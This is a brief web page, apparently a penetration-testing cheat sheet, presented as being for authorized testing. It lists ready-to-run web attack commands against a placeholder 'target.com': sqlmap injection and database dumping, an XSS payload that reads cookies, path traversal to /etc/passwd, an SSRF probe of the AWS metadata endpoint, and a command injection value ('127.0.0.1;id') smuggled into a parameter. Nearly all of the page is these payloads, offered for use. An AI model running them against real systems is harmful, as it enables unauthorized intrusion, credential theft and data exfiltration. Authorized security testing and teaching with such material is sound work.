D3F4
>Loading command center_

Common web application exploitation techniques and test payloads for authorized penetration testing.
Test a URL parameter for SQL injection and dump databases
sqlmap -u "http://target.com/page?id=1" --dbsTest a POST form for SQL injection
sqlmap -u "http://target.com/login" --data="user=admin&pass=1" -p userBasic reflected XSS payload for testing
<script>alert(document.cookie)</script>Test for Local File Inclusion via path traversal
curl "http://target.com/page?file=../../../../etc/passwd"Test for SSRF by probing AWS metadata service
curl "http://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"Route curl requests through Burp Suite intercept proxy
curl -x http://127.0.0.1:8080 http://target.comTest for OS command injection in a parameter
curl "http://target.com/ping?host=127.0.0.1;id"